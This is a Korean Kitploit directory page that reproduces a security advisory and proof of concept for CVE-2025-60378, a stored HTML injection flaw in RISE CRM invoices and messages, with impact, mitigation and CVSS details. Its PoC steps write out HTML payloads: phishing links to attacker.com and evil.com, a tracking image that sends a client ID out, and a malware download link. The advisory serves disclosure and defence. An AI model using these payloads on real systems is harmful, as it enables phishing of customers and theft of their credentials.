Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-60378 — # RISE CRM 저장형 HTML 인젝션 PoC RISE CRM의 저장형 HTML 인젝션에 대한 개념 증명(PoC)으로, 인증된 사용자가 인보이스와 메시지에 악성 HTML을 주입할 수 있음을 보여줍니다. 이를 통해 자동화된 이메일과 PDF를 경유한 피싱 및 악성코드 유포가 가능해집니다. | Kitploit
도구/GitHubGitHub/ajansha/cve-2025-60378
Vulnerability AnalysisExploitationWeb Application ExploitationPhishingWeb SecurityLearning & Education
GitHubajansha/cve-2025-60378

CVE-2025-60378

# RISE CRM 저장형 HTML 인젝션 PoC RISE CRM의 저장형 HTML 인젝션에 대한 개념 증명(PoC)으로, 인증된 사용자가 인보이스와 메시지에 악성 HTML을 주입할 수 있음을 보여줍니다. 이를 통해 자동화된 이메일과 PDF를 경유한 피싱 및 악성코드 유포가 가능해집니다.

저장소 보기
611개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-60378: RISE Ultimate Project Manager & CRM의 저장형 HTML 인젝션

⚠️ 보안 권고
인보이스, 메시징 및 자동화 커뮤니케이션에 영향을 미치는 치명적인 저장형 HTML 인젝션 취약점

CVE Severity CVSS Product


📋 개요

RISE Ultimate Project Manager & CRM에서 인증된 사용자가 인보이스 품목, 고객 메모 및 메시징 모듈에 악성 HTML을 주입할 수 있는 치명적인 저장형 HTML 인젝션 취약점이 발견되었습니다. 주입된 콘텐츠는 데이터베이스에 영구 저장되며 고객 대상 이메일, PDF 및 채팅 커뮤니케이션에서 자동으로 렌더링되어 대규모 피싱 공격, 비즈니스 이메일 침해(BEC) 및 이메일/PDF 기반 악성코드 유포를 가능하게 합니다.

🎯 영향을 받는 버전

  • 제품: RISE - Ultimate Project Manager & CRM
  • 취약한 버전: 3.9.4 미만
  • 수정 버전: 3.9.4 이상

🔍 취약점 세부 정보

속성값
CVE IDCVE-2025-60378
유형저장형 HTML 인젝션
CWECWE-79
공격 경로네트워크/원격
인증필요 (낮은 권한)
사용자 상호작용없음
심각도높음(HIGH)
CVSS v3.18.1 - 높음
발견자Ajansha Shankar

설명

RISE CRM은 인보이스, 메시지 및 고객 메모를 포함한 여러 사용자 편집 가능 필드에서 HTML 콘텐츠를 적절히 검증(sanitize)하고 인코딩하지 못합니다. 인증된 사용자가 이러한 필드에 HTML 페이로드를 주입하면 콘텐츠가 적절한 필터링 없이 데이터베이스에 저장됩니다. 이후 이 악성 HTML은 적절한 이스케이프 처리 없이 고객 대상 이메일, PDF 첨부 파일 및 메시징/채팅 모듈에서 자동으로 렌더링됩니다. 반복 인보이스와 자동화된 메시징은 악성 콘텐츠를 동시에 여러 수신자에게 배포하여 공격을 증폭시킵니다.

영향을 받는 구성 요소

  • ✗ 인보이스 품목 (설명 필드)
  • ✗ 고객 메모/메시징 모듈
  • ✗ 채팅 및 메시징 시스템
  • ✗ 고객 명세서 생성 모듈
  • ✗ 자동 이메일 시스템 (반복 인보이스, 알림)
  • ✗ PDF 첨부 파일

근본 원인

  • ❌ 인보이스, 메시지 및 고객 메모 필드에 대한 입력 검증(sanitization) 부족
  • ❌ 이메일 템플릿 및 PDF 생성 시 HTML 출력 인코딩 누락
  • ❌ 데이터베이스 저장 전 콘텐츠 검증 부재
  • ❌ 고객 커뮤니케이션의 HTML/JavaScript 제한 부재
  • ❌ 자동화 시스템이 추가 필터링 없이 검증되지 않은 콘텐츠를 배포

💥 영향

보안 영향

  • 🎣 대규모 피싱: 주입된 콘텐츠가 정상적인 커뮤니케이션을 사칭하여 여러 고객을 공격자 통제 사이트로 리디렉션할 수 있음
  • 💼 비즈니스 이메일 침해(BEC): 고객에게 전송된 악성 인보이스와 메시지가 신뢰할 수 있는 출처에서 온 것처럼 보임
  • 💬 메시징 침해: 채팅/메시징의 악성 페이로드가 팀 구성원과 고객에게 직접 전달됨
  • 🦠 악성코드 유포: 삽입된 악성 링크 또는 iframe이 이메일/PDF/메시징을 통해 악성코드를 전달
  • 🔄 자동화된 공격 배포: 반복 인보이스와 자동 메시지가 수동 개입 없이 여러 수신자에게 페이로드 전달
  • 👥 다중 벡터 공격: 이메일, PDF 및 메시징 공격 표면의 결합으로 성공적인 침해율 증가

CIA 3요소 평가

요소영향설명
기밀성🔴 높음피싱을 통해 고객 자격 증명 및 민감한 데이터 탈취 가능
무결성🔴 높음악성 콘텐츠가 커뮤니케이션 및 비즈니스 관계에 대한 인식을 조작할 수 있음
가용성🟡 낮음시스템 가용성에 대한 직접적인 영향은 제한적

실제 공격 시나리오

시나리오 1: 인보이스 기반 피싱 캠페인

낮은 권한의 프로젝트 관리자 접근 권한을 가진 공격자가 악성 HTML이 포함된 인보이스를 생성합니다:

root@kitploit:~
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>

인보이스는 자동 이메일을 통해 100명 이상의 고객에게 전송됩니다. 모든 고객은 피싱 사이트로 안내하는 정상적인 인보이스처럼 보이는 콘텐츠를 받게 됩니다. 공격자는 동시에 여러 피해자로부터 자격 증명을 탈취합니다.

시나리오 2: 메시징 기반 공격

공격자가 고객 메시지에 악성 HTML을 주입합니다:

root@kitploit:~
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>

모든 팀 구성원과 고객이 채팅에서 메시지를 받고, 링크를 클릭하여 악성코드를 다운로드하게 됩니다.

시나리오 3: 반복 인보이스를 통한 악성코드 유포

공격자가 악성코드 전달 페이로드가 포함된 반복 인보이스를 설정합니다. 매월 고객은 악성 콘텐츠가 포함된 인보이스를 자동으로 받게 되어 지속적인 공격 벡터를 제공합니다.

🧪 개념 증명(PoC)

환경 설정

  • 인보이스/메시지 생성 권한이 있는 RISE CRM 관리자 패널 접근 권한
  • 3.9.4 이전 버전

PoC 단계

1단계: 인보이스 또는 메시지 생성 접근

root@kitploit:~
이동: RISE CRM 대시보드 → 인보이스/메시지 → 새로 만들기

2단계: 설명/메시지 필드에 HTML 페이로드 주입

root@kitploit:~
<a href="https://attacker.com">Click here to view invoice</a>

3단계: 리디렉션이 포함된 악성 이미지 추가

root@kitploit:~
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>

4단계: 오해를 유발하는 스타일링 페이로드 추가

root@kitploit:~
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>

5단계: 반복 배포 구성

  • 레코드 저장
  • "반복(Recurring)" 옵션 활성화 (인보이스/메시지에서 사용 가능한 경우)
  • 빈도 설정 (주간, 월간 등)
  • 시스템이 관련 모든 고객에게 자동 전송

6단계: 공격 벡터 검증

  • 고객 이메일 받은 편지함 확인
  • 고객 메시징/채팅 확인
  • PDF 첨부 파일 열기
  • 모든 채널에서 악성 HTML 렌더링 확인

예상 결과

✅ 주입된 HTML이 이스케이프 없이 이메일, PDF 및 메시징에서 렌더링됨 ✅ 링크가 클릭 가능하며 공격자 사이트로 리디렉션됨 ✅ 이미지가 공격자 통제 서버에서 로드됨 ✅ 콘텐츠가 향후 모든 고객 커뮤니케이션에 영구 유지됨 ✅ 반복 배포가 여러 수신자에게 자동으로 도달함

🛡️ 완화 조치

최종 사용자용

  1. ✅ 즉시 업그레이드: RISE CRM v3.9.4 이상으로 업데이트
  2. 🔍 모든 레코드 감사: 최근 인보이스, 메시지 및 고객 메모에서 의심스러운 HTML 콘텐츠 검토
  3. ⚠️ 고객 통지: 의심스러운 인보이스 또는 메시지가 전송된 경우 모든 고객에게 경고
  4. 🔄 자격 증명 재설정: 링크를 클릭한 고객에게 비밀번호 변경 권장
  5. 📝 활동 모니터링: 인보이스/메시지 무단 수정에 대한 감사 로그 확인
  6. 🔐 반복 기능 비활성화: 패치 적용 전까지 반복 인보이스/메시지 일시 비활성화

📚 참고 자료

  • CWE-79: 웹 페이지 생성 중 입력의 부적절한 중화
  • OWASP: 교차 사이트 스크립팅 (XSS)
  • OWASP: HTML 인젝션
  • OWASP: 출력 인코딩
  • CVE-2025-60378 공식 등록 정보

📅 타임라인

날짜이벤트
TBD취약점 발견
TBD공급업체에 통보
TBDCVE-2025-60378 배정
TBD패치 출시 (v3.9.4)
TBD공개 공개

👤 크레딧

발견자: Ajansha Shankar

LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

📊 CVSS v3.1 평가

벡터: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

점수: 8.1 (높음)

세부 분석:

  • 공격 경로 (AV:N): 네트워크 - 원격으로 악용 가능
  • 공격 복잡성 (AC:L): 낮음 - 특별한 조건 불필요
  • 필요 권한 (PR:L): 낮음 - 기본 프로젝트 관리자 권한을 가진 인증된 사용자 필요
  • 사용자 상호작용 (UI:N): 없음 - 사용자 상호작용 불필요; 자동화 시스템이 페이로드 배포
  • 범위 (S:U): 변경 없음 - 영향이 취약한 구성 요소로 제한됨
  • 기밀성 (C:H): 높음 - 여러 고객을 대상으로 한 피싱을 통한 자격 증명 탈취 가능
  • 무결성 (I:H): 높음 - 악성 콘텐츠가 여러 수신자에게 주입 및 전달될 수 있음
  • 가용성 (A:N): 없음 - 시스템 가용성에 영향 없음

📧 연락처

질문 또는 추가 정보가 필요한 경우:

  • LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

⭐ 이 연구가 도움이 되었다면 이 저장소에 스타(star)를 부여해 주시기 바랍니다!

🔔 최신 정보 유지: 이 저장소를 워치(watch)하여 이번 및 향후 보안 연구에 대한 업데이트를 확인하세요.

  • CVE-2025-60374 - Perfex CRM 챗봇의 저장형 XSS
  • CVE-2025-55903 - Perfex CRM 인보이스의 저장형 HTML 인젝션
  • CVE-2025-60375 - Perfex CRM의 인증 우회
도구 다운로드